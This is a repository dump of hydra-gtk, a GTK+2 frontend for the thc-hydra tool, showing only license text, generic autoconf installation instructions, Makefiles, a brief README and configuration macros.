license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Library General
Public License instead of this License.

0
hydra-gtk/ChangeLog Executable file
View file

182
hydra-gtk/INSTALL Executable file
View file

@ -0,0 +1,182 @@
Basic Installation
==================
These are generic installation instructions.
The `configure' shell script attempts to guess correct values for
various system-dependent variables used during compilation. It uses
those values to create a `Makefile' in each directory of the package.
It may also create one or more `.h' files containing system-dependent
definitions. Finally, it creates a shell script `config.status' that
you can run in the future to recreate the current configuration, a file
`config.cache' that saves the results of its tests to speed up
reconfiguring, and a file `config.log' containing compiler output
(useful mainly for debugging `configure').
If you need to do unusual things to compile the package, please try
to figure out how `configure' could check whether to do them, and mail
diffs or instructions to the address given in the `README' so they can
be considered for the next release. If at some point `config.cache'
contains results you don't want to keep, you may remove or edit it.
The file `configure.in' is used to create `configure' by a program
called `autoconf'. You only need `configure.in' if you want to change
it or regenerate `configure' using a newer version of `autoconf'.
The simplest way to compile this package is:
1. `cd' to the directory containing the package's source code and type
`./configure' to configure the package for your system. If you're
using `csh' on an old version of System V, you might need to type
`sh ./configure' instead to prevent `csh' from trying to execute
`configure' itself.
Running `configure' takes awhile. While running, it prints some
messages telling which features it is checking for.
2. Type `make' to compile the package.
3. Optionally, type `make check' to run any self-tests that come with
the package.
4. Type `make install' to install the programs and any data files and
documentation.
5. You can remove the program binaries and object files from the
source code directory by typing `make clean'. To also remove the
files that `configure' created (so you can compile the package for
a different kind of computer), type `make distclean'. There is
also a `make maintainer-clean' target, but that is intended mainly
for the package's developers. If you use it, you may have to get
all sorts of other programs in order to regenerate files that came
with the distribution.
Compilers and Options
=====================
Some systems require unusual options for compilation or linking that
the `configure' script does not know about. You can give `configure'
initial values for variables by setting them in the environment. Using
a Bourne-compatible shell, you can do that on the command line like
this:
CC=c89 CFLAGS=-O2 LIBS=-lposix ./configure
Or on systems that have the `env' program, you can do it like this:
env CPPFLAGS=-I/usr/local/include LDFLAGS=-s ./configure
Compiling For Multiple Architectures
====================================
You can compile the package for more than one kind of computer at the
same time, by placing the object files for each architecture in their
own directory. To do this, you must use a version of `make' that
supports the `VPATH' variable, such as GNU `make'. `cd' to the
directory where you want the object files and executables to go and run
the `configure' script. `configure' automatically checks for the
source code in the directory that `configure' is in and in `..'.
If you have to use a `make' that does not supports the `VPATH'
variable, you have to compile the package for one architecture at a time
in the source code directory. After you have installed the package for
one architecture, use `make distclean' before reconfiguring for another
architecture.
Installation Names
==================
By default, `make install' will install the package's files in
`/usr/local/bin', `/usr/local/man', etc. You can specify an
installation prefix other than `/usr/local' by giving `configure' the
option `--prefix=PATH'.
You can specify separate installation prefixes for
architecture-specific files and architecture-independent files. If you
give `configure' the option `--exec-prefix=PATH', the package will use
PATH as the prefix for installing programs and libraries.
Documentation and other data files will still use the regular prefix.
In addition, if you use an unusual directory layout you can give
options like `--bindir=PATH' to specify different values for particular
kinds of files. Run `configure --help' for a list of the directories
you can set and what kinds of files go in them.
If the package supports it, you can cause programs to be installed
with an extra prefix or suffix on their names by giving `configure' the
option `--program-prefix=PREFIX' or `--program-suffix=SUFFIX'.
Optional Features
=================
Some packages pay attention to `--enable-FEATURE' options to
`configure', where FEATURE indicates an optional part of the package.
They may also pay attention to `--with-PACKAGE' options, where PACKAGE
is something like `gnu-as' or `x' (for the X Window System). The
`README' should mention any `--enable-' and `--with-' options that the
package recognizes.
For packages that use the X Window System, `configure' can usually
find the X include and library files automatically, but if it doesn't,
you can use the `configure' options `--x-includes=DIR' and
`--x-libraries=DIR' to specify their locations.
Specifying the System Type
==========================
There may be some features `configure' can not figure out
automatically, but needs to determine by the type of host the package
will run on. Usually `configure' can figure that out, but if it prints
a message saying it can not guess the host type, give it the
`--host=TYPE' option. TYPE can either be a short name for the system
type, such as `sun4', or a canonical name with three fields:
CPU-COMPANY-SYSTEM
See the file `config.sub' for the possible values of each field. If
`config.sub' isn't included in this package, then this package doesn't
need to know the host type.
If you are building compiler tools for cross-compiling, you can also
use the `--target=TYPE' option to select the type of system they will
produce code for and the `--build=TYPE' option to select the type of
system on which you are compiling the package.
Sharing Defaults
================
If you want to set default values for `configure' scripts to share,
you can create a site shell script called `config.site' that gives
default values for variables like `CC', `cache_file', and `prefix'.
`configure' looks for `PREFIX/share/config.site' if it exists, then
`PREFIX/etc/config.site' if it exists. Or, you can set the
`CONFIG_SITE' environment variable to the location of the site script.
A warning: not all `configure' scripts look for a site script.
Operation Controls
==================
`configure' recognizes the following options to control how it
operates.
`--cache-file=FILE'
Use and save the results of the tests in FILE instead of
`./config.cache'. Set FILE to `/dev/null' to disable caching, for
debugging `configure'.
`--help'
Print a summary of the options to `configure', and exit.
`--quiet'
`--silent'
`-q'
Do not print messages saying which checks are being made. To
suppress all normal output, redirect it to `/dev/null' (any error
messages will still be shown).
`--srcdir=DIR'
Look for the package's source code in directory DIR. Usually
`configure' can determine that directory automatically.
`--version'
Print the version of Autoconf used to generate the `configure'
script, and exit.
`configure' also accepts some other, not widely useful, options.

30
hydra-gtk/Makefile.am Executable file
View file

@ -0,0 +1,30 @@
## Process this file with automake to produce Makefile.in
SUBDIRS = src
EXTRA_DIST = \
autogen.sh \
xhydra.glade \
xhydra.gladep
install-data-local:
@$(NORMAL_INSTALL)
if test -d $(srcdir)/pixmaps; then \
$(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \
for pixmap in $(srcdir)/pixmaps/*; do \
if test -f $$pixmap; then \
$(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \
fi \
done \
fi
dist-hook:
if test -d pixmaps; then \
mkdir $(distdir)/pixmaps; \
for pixmap in pixmaps/*; do \
if test -f $$pixmap; then \
cp -p $$pixmap $(distdir)/pixmaps; \
fi \
done \
fi

382
hydra-gtk/Makefile.in Executable file
View file

@ -0,0 +1,382 @@
# Makefile.in generated automatically by automake 1.4-p6 from Makefile.am
# Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc.
# This Makefile.in is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.
SHELL = @SHELL@
srcdir = @srcdir@
top_srcdir = @top_srcdir@
VPATH = @srcdir@
prefix = @prefix@
exec_prefix = @exec_prefix@
bindir = @bindir@
sbindir = @sbindir@
libexecdir = @libexecdir@
datadir = @datadir@
sysconfdir = @sysconfdir@
sharedstatedir = @sharedstatedir@
localstatedir = @localstatedir@
libdir = @libdir@
infodir = @infodir@
mandir = @mandir@
includedir = @includedir@
oldincludedir = /usr/include
DESTDIR =
pkgdatadir = $(datadir)/@PACKAGE@
pkglibdir = $(libdir)/@PACKAGE@
pkgincludedir = $(includedir)/@PACKAGE@
top_builddir = .
ACLOCAL = @ACLOCAL@
AUTOCONF = @AUTOCONF@
AUTOMAKE = @AUTOMAKE@
AUTOHEADER = @AUTOHEADER@
INSTALL = @INSTALL@
INSTALL_PROGRAM = @INSTALL_PROGRAM@ $(AM_INSTALL_PROGRAM_FLAGS)
INSTALL_DATA = @INSTALL_DATA@
INSTALL_SCRIPT = @INSTALL_SCRIPT@
transform = @program_transform_name@
NORMAL_INSTALL = :
PRE_INSTALL = :
POST_INSTALL = :
NORMAL_UNINSTALL = :
PRE_UNINSTALL = :
POST_UNINSTALL = :
CC = @CC@
MAINT = @MAINT@
MAKEINFO = @MAKEINFO@
PACKAGE = @PACKAGE@
PACKAGE_CFLAGS = @PACKAGE_CFLAGS@
PACKAGE_LIBS = @PACKAGE_LIBS@
PKG_CONFIG = @PKG_CONFIG@
VERSION = @VERSION@
SUBDIRS = src
EXTRA_DIST = autogen.sh xhydra.glade xhydra.gladep
ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs
CONFIG_HEADER = config.h
CONFIG_CLEAN_FILES =
DIST_COMMON = README ./stamp-h.in AUTHORS COPYING ChangeLog INSTALL \
Makefile.am Makefile.in NEWS acconfig.h aclocal.m4 config.h.in \
configure configure.in install-sh missing mkinstalldirs
DISTFILES = $(DIST_COMMON) $(SOURCES) $(HEADERS) $(TEXINFOS) $(EXTRA_DIST)
TAR = tar
GZIP_ENV = --best
all: all-redirect
.SUFFIXES:
$(srcdir)/Makefile.in: @MAINTAINER_MODE_TRUE@ Makefile.am $(top_srcdir)/configure.in $(ACLOCAL_M4)
cd $(top_srcdir) && $(AUTOMAKE) --gnu Makefile
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status $(BUILT_SOURCES)
cd $(top_builddir) \
&& CONFIG_FILES=$@ CONFIG_HEADERS= $(SHELL) ./config.status
$(ACLOCAL_M4): @MAINTAINER_MODE_TRUE@ configure.in
cd $(srcdir) && $(ACLOCAL)
config.status: $(srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
$(SHELL) ./config.status --recheck
$(srcdir)/configure: @MAINTAINER_MODE_TRUE@$(srcdir)/configure.in $(ACLOCAL_M4) $(CONFIGURE_DEPENDENCIES)
cd $(srcdir) && $(AUTOCONF)
config.h: stamp-h
@if test ! -f $@; then \
rm -f stamp-h; \
$(MAKE) stamp-h; \
else :; fi
stamp-h: $(srcdir)/config.h.in $(top_builddir)/config.status
cd $(top_builddir) \
&& CONFIG_FILES= CONFIG_HEADERS=config.h \
$(SHELL) ./config.status
@echo timestamp > stamp-h 2> /dev/null
$(srcdir)/config.h.in: @MAINTAINER_MODE_TRUE@$(srcdir)/stamp-h.in
@if test ! -f $@; then \
rm -f $(srcdir)/stamp-h.in; \
$(MAKE) $(srcdir)/stamp-h.in; \
else :; fi
$(srcdir)/stamp-h.in: $(top_srcdir)/configure.in $(ACLOCAL_M4) acconfig.h
cd $(top_srcdir) && $(AUTOHEADER)
@echo timestamp > $(srcdir)/stamp-h.in 2> /dev/null
mostlyclean-hdr:
clean-hdr:
distclean-hdr:
-rm -f config.h
maintainer-clean-hdr:
# This directory's subdirectories are mostly independent; you can cd
# into them and run `make' without going through this Makefile.
# To change the values of `make' variables: instead of editing Makefiles,
# (1) if the variable is set in `config.status', edit `config.status'
# (which will cause the Makefiles to be regenerated when you run `make');
# (2) otherwise, pass the desired values on the `make' command line.
@SET_MAKE@
all-recursive install-data-recursive install-exec-recursive \
installdirs-recursive install-recursive uninstall-recursive \
check-recursive installcheck-recursive info-recursive dvi-recursive:
@set fnord $(MAKEFLAGS); amf=$$2; \
dot_seen=no; \
target=`echo $@ | sed s/-recursive//`; \
list='$(SUBDIRS)'; for subdir in $$list; do \
echo "Making $$target in $$subdir"; \
if test "$$subdir" = "."; then \
dot_seen=yes; \
local_target="$$target-am"; \
else \
local_target="$$target"; \
fi; \
(cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \
|| case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
done; \
if test "$$dot_seen" = "no"; then \
$(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \
fi; test -z "$$fail"
mostlyclean-recursive clean-recursive distclean-recursive \
maintainer-clean-recursive:
@set fnord $(MAKEFLAGS); amf=$$2; \
dot_seen=no; \
rev=''; list='$(SUBDIRS)'; for subdir in $$list; do \
rev="$$subdir $$rev"; \
test "$$subdir" != "." || dot_seen=yes; \
done; \
test "$$dot_seen" = "no" && rev=". $$rev"; \
target=`echo $@ | sed s/-recursive//`; \
for subdir in $$rev; do \
echo "Making $$target in $$subdir"; \
if test "$$subdir" = "."; then \
local_target="$$target-am"; \
else \
local_target="$$target"; \
fi; \
(cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \
|| case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
done && test -z "$$fail"
tags-recursive:
list='$(SUBDIRS)'; for subdir in $$list; do \
test "$$subdir" = . || (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \
done
tags: TAGS
ID: $(HEADERS) $(SOURCES) $(LISP)
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
here=`pwd` && cd $(srcdir) \
&& mkid -f$$here/ID $$unique $(LISP)
TAGS: tags-recursive $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) $(LISP)
tags=; \
here=`pwd`; \
list='$(SUBDIRS)'; for subdir in $$list; do \
if test "$$subdir" = .; then :; else \
test -f $$subdir/TAGS && tags="$$tags -i $$here/$$subdir/TAGS"; \
fi; \
done; \
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
test -z "$(ETAGS_ARGS)config.h.in$$unique$(LISP)$$tags" \
|| (cd $(srcdir) && etags $(ETAGS_ARGS) $$tags config.h.in $$unique $(LISP) -o $$here/TAGS)
mostlyclean-tags:
clean-tags:
distclean-tags:
-rm -f TAGS ID
maintainer-clean-tags:
distdir = $(PACKAGE)-$(VERSION)
top_distdir = $(distdir)
# This target untars the dist file and tries a VPATH configuration. Then
# it guarantees that the distribution is self-contained by making another
# tarfile.
distcheck: dist
-rm -rf $(distdir)
GZIP=$(GZIP_ENV) $(TAR) zxf $(distdir).tar.gz
mkdir $(distdir)/=build
mkdir $(distdir)/=inst
dc_install_base=`cd $(distdir)/=inst && pwd`; \
cd $(distdir)/=build \
&& ../configure --srcdir=.. --prefix=$$dc_install_base \
&& $(MAKE) $(AM_MAKEFLAGS) \
&& $(MAKE) $(AM_MAKEFLAGS) dvi \
&& $(MAKE) $(AM_MAKEFLAGS) check \
&& $(MAKE) $(AM_MAKEFLAGS) install \
&& $(MAKE) $(AM_MAKEFLAGS) installcheck \
&& $(MAKE) $(AM_MAKEFLAGS) dist
-rm -rf $(distdir)
@banner="$(distdir).tar.gz is ready for distribution"; \
dashes=`echo "$$banner" | sed s/./=/g`; \
echo "$$dashes"; \
echo "$$banner"; \
echo "$$dashes"
dist: distdir
-chmod -R a+r $(distdir)
GZIP=$(GZIP_ENV) $(TAR) chozf $(distdir).tar.gz $(distdir)
-rm -rf $(distdir)
dist-all: distdir
-chmod -R a+r $(distdir)
GZIP=$(GZIP_ENV) $(TAR) chozf $(distdir).tar.gz $(distdir)
-rm -rf $(distdir)
distdir: $(DISTFILES)
-rm -rf $(distdir)
mkdir $(distdir)
-chmod 777 $(distdir)
here=`cd $(top_builddir) && pwd`; \
top_distdir=`cd $(distdir) && pwd`; \
distdir=`cd $(distdir) && pwd`; \
cd $(top_srcdir) \
&& $(AUTOMAKE) --include-deps --build-dir=$$here --srcdir-name=$(top_srcdir) --output-dir=$$top_distdir --gnu Makefile
@for file in $(DISTFILES); do \
d=$(srcdir); \
if test -d $$d/$$file; then \
cp -pr $$d/$$file $(distdir)/$$file; \
else \
test -f $(distdir)/$$file \
|| ln $$d/$$file $(distdir)/$$file 2> /dev/null \
|| cp -p $$d/$$file $(distdir)/$$file || :; \
fi; \
done
for subdir in $(SUBDIRS); do \
if test "$$subdir" = .; then :; else \
test -d $(distdir)/$$subdir \
|| mkdir $(distdir)/$$subdir \
|| exit 1; \
chmod 777 $(distdir)/$$subdir; \
(cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir=../$(distdir) distdir=../$(distdir)/$$subdir distdir) \
|| exit 1; \
fi; \
done
$(MAKE) $(AM_MAKEFLAGS) top_distdir="$(top_distdir)" distdir="$(distdir)" dist-hook
info-am:
info: info-recursive
dvi-am:
dvi: dvi-recursive
check-am: all-am
check: check-recursive
installcheck-am:
installcheck: installcheck-recursive
all-recursive-am: config.h
$(MAKE) $(AM_MAKEFLAGS) all-recursive
install-exec-am:
install-exec: install-exec-recursive
install-data-am: install-data-local
install-data: install-data-recursive
install-am: all-am
@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
install: install-recursive
uninstall-am:
uninstall: uninstall-recursive
all-am: Makefile config.h
all-redirect: all-recursive-am
install-strip:
$(MAKE) $(AM_MAKEFLAGS) AM_INSTALL_PROGRAM_FLAGS=-s install
installdirs: installdirs-recursive
installdirs-am:
mostlyclean-generic:
clean-generic:
distclean-generic:
-rm -f Makefile $(CONFIG_CLEAN_FILES)
-rm -f config.cache config.log stamp-h stamp-h[0-9]*
maintainer-clean-generic:
mostlyclean-am: mostlyclean-hdr mostlyclean-tags mostlyclean-generic
mostlyclean: mostlyclean-recursive
clean-am: clean-hdr clean-tags clean-generic mostlyclean-am
clean: clean-recursive
distclean-am: distclean-hdr distclean-tags distclean-generic clean-am
distclean: distclean-recursive
-rm -f config.status
maintainer-clean-am: maintainer-clean-hdr maintainer-clean-tags \
maintainer-clean-generic distclean-am
@echo "This command is intended for maintainers to use;"
@echo "it deletes files that may require special tools to rebuild."
maintainer-clean: maintainer-clean-recursive
-rm -f config.status
.PHONY: mostlyclean-hdr distclean-hdr clean-hdr maintainer-clean-hdr \
install-data-recursive uninstall-data-recursive install-exec-recursive \
uninstall-exec-recursive installdirs-recursive uninstalldirs-recursive \
all-recursive check-recursive installcheck-recursive info-recursive \
dvi-recursive mostlyclean-recursive distclean-recursive clean-recursive \
maintainer-clean-recursive tags tags-recursive mostlyclean-tags \
distclean-tags clean-tags maintainer-clean-tags distdir info-am info \
dvi-am dvi check check-am installcheck-am installcheck all-recursive-am \
install-exec-am install-exec install-data-local install-data-am \
install-data install-am install uninstall-am uninstall all-redirect \
all-am all installdirs-am installdirs mostlyclean-generic \
distclean-generic clean-generic maintainer-clean-generic clean \
mostlyclean distclean maintainer-clean
install-data-local:
@$(NORMAL_INSTALL)
if test -d $(srcdir)/pixmaps; then \
$(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \
for pixmap in $(srcdir)/pixmaps/*; do \
if test -f $$pixmap; then \
$(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \
fi \
done \
fi
dist-hook:
if test -d pixmaps; then \
mkdir $(distdir)/pixmaps; \
for pixmap in pixmaps/*; do \
if test -f $$pixmap; then \
cp -p $$pixmap $(distdir)/pixmaps; \
fi \
done \
fi
# Tell versions [3.59,3.63) of GNU make to not export all variables.
# Otherwise a system limit (for SysV at least) may be exceeded.
.NOEXPORT:

0
hydra-gtk/NEWS Executable file
View file

19
hydra-gtk/README Executable file
View file

@ -0,0 +1,19 @@
Hydra-GTK
Gtk+2 frontend for thc-hydra
To install just do a:
./configure
make
su root
make install
Easy at it can be... You need thc-hydra installed to make this work.
This is my second gtk+2 program, so I am waiting for a lot of patches :)
Mail them to snakebyte@gmx.de

7
hydra-gtk/acconfig.h Executable file
View file

@ -0,0 +1,7 @@
#undef ENABLE_NLS
#undef HAVE_CATGETS
#undef HAVE_GETTEXT
#undef GETTEXT_PACKAGE
#undef HAVE_LC_MESSAGES
#undef HAVE_STPCPY
#undef HAVE_LIBSM

363
hydra-gtk/aclocal.m4 vendored Executable file
View file

@ -0,0 +1,363 @@
dnl aclocal.m4 generated automatically by aclocal 1.4-p6
dnl Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
dnl with or without modifications, as long as this notice is preserved.
dnl This program is distributed in the hope that it will be useful,
dnl but WITHOUT ANY WARRANTY, to the extent permitted by law; without
dnl even the implied warranty of MERCHANTABILITY or FITNESS FOR A
dnl PARTICULAR PURPOSE.
# Do all the work for Automake. This macro actually does too much --
# some checks are only needed if your package does certain things.
# But this isn't really a big deal.
# serial 1
dnl Usage:
dnl AM_INIT_AUTOMAKE(package,version, [no-define])
AC_DEFUN([AM_INIT_AUTOMAKE],
[AC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl
AC_REQUIRE([AC_PROG_INSTALL])
PACKAGE=[$1]
AC_SUBST(PACKAGE)
VERSION=[$2]
AC_SUBST(VERSION)
dnl test to see if srcdir already configured
if test "`cd $srcdir && pwd`" != "`pwd`" && test -f $srcdir/config.status; then
AC_MSG_ERROR([source directory already configured; run "make distclean" there first])
fi
ifelse([$3],,
AC_DEFINE_UNQUOTED(PACKAGE, "$PACKAGE", [Name of package])
AC_DEFINE_UNQUOTED(VERSION, "$VERSION", [Version number of package]))
AC_REQUIRE([AM_SANITY_CHECK])
AC_REQUIRE([AC_ARG_PROGRAM])
dnl FIXME This is truly gross.
missing_dir=`cd $ac_aux_dir && pwd`
AM_MISSING_PROG(ACLOCAL, aclocal-${am__api_version}, $missing_dir)
AM_MISSING_PROG(AUTOCONF, autoconf, $missing_dir)
AM_MISSING_PROG(AUTOMAKE, automake-${am__api_version}, $missing_dir)
AM_MISSING_PROG(AUTOHEADER, autoheader, $missing_dir)
AM_MISSING_PROG(MAKEINFO, makeinfo, $missing_dir)
AC_REQUIRE([AC_PROG_MAKE_SET])])
# Copyright 2002 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# AM_AUTOMAKE_VERSION(VERSION)
# ----------------------------
# Automake X.Y traces this macro to ensure aclocal.m4 has been
# generated from the m4 files accompanying Automake X.Y.
AC_DEFUN([AM_AUTOMAKE_VERSION],[am__api_version="1.4"])
# AM_SET_CURRENT_AUTOMAKE_VERSION
# -------------------------------
# Call AM_AUTOMAKE_VERSION so it can be traced.
# This function is AC_REQUIREd by AC_INIT_AUTOMAKE.
AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION],
[AM_AUTOMAKE_VERSION([1.4-p6])])
#
# Check to make sure that the build environment is sane.
#
AC_DEFUN([AM_SANITY_CHECK],
[AC_MSG_CHECKING([whether build environment is sane])
# Just in case
sleep 1
echo timestamp > conftestfile
# Do `set' in a subshell so we don't clobber the current shell's
# arguments. Must try -L first in case configure is actually a
# symlink; some systems play weird games with the mod time of symlinks
# (eg FreeBSD returns the mod time of the symlink's containing
# directory).
if (
set X `ls -Lt $srcdir/configure conftestfile 2> /dev/null`
if test "[$]*" = "X"; then
# -L didn't work.
set X `ls -t $srcdir/configure conftestfile`
fi
if test "[$]*" != "X $srcdir/configure conftestfile" \
&& test "[$]*" != "X conftestfile $srcdir/configure"; then
# If neither matched, then we have a broken ls. This can happen
# if, for instance, CONFIG_SHELL is bash and it inherits a
# broken ls alias from the environment. This has actually
# happened. Such a system could not be considered "sane".
AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken
alias in your environment])
fi
test "[$]2" = conftestfile
)
then
# Ok.
:
else
AC_MSG_ERROR([newly created file is older than distributed files!
Check your system clock])
fi
rm -f conftest*
AC_MSG_RESULT(yes)])
dnl AM_MISSING_PROG(NAME, PROGRAM, DIRECTORY)
dnl The program must properly implement --version.
AC_DEFUN([AM_MISSING_PROG],
[AC_MSG_CHECKING(for working $2)
# Run test in a subshell; some versions of sh will print an error if
# an executable is not found, even if stderr is redirected.
# Redirect stdin to placate older versions of autoconf. Sigh.
if ($2 --version) < /dev/null > /dev/null 2>&1; then
$1=$2
AC_MSG_RESULT(found)
else
$1="$3/missing $2"
AC_MSG_RESULT(missing)
fi
AC_SUBST($1)])
# Like AC_CONFIG_HEADER, but automatically create stamp file.
AC_DEFUN([AM_CONFIG_HEADER],
[AC_PREREQ([2.12])
AC_CONFIG_HEADER([$1])
dnl When config.status generates a header, we must update the stamp-h file.
dnl This file resides in the same directory as the config header
dnl that is generated. We must strip everything past the first ":",
dnl and everything past the last "/".
AC_OUTPUT_COMMANDS(changequote(<<,>>)dnl
ifelse(patsubst(<<$1>>, <<[^ ]>>, <<>>), <<>>,
<<test -z "<<$>>CONFIG_HEADERS" || echo timestamp > patsubst(<<$1>>, <<^\([^:]*/\)?.*>>, <<\1>>)stamp-h<<>>dnl>>,
<<am_indx=1
for am_file in <<$1>>; do
case " <<$>>CONFIG_HEADERS " in
*" <<$>>am_file "*<<)>>
echo timestamp > `echo <<$>>am_file | sed -e 's%:.*%%' -e 's%[^/]*$%%'`stamp-h$am_indx
;;
esac
am_indx=`expr "<<$>>am_indx" + 1`
done<<>>dnl>>)
changequote([,]))])
# Add --enable-maintainer-mode option to configure.
# From Jim Meyering
# serial 1
AC_DEFUN([AM_MAINTAINER_MODE],
[AC_MSG_CHECKING([whether to enable maintainer-specific portions of Makefiles])
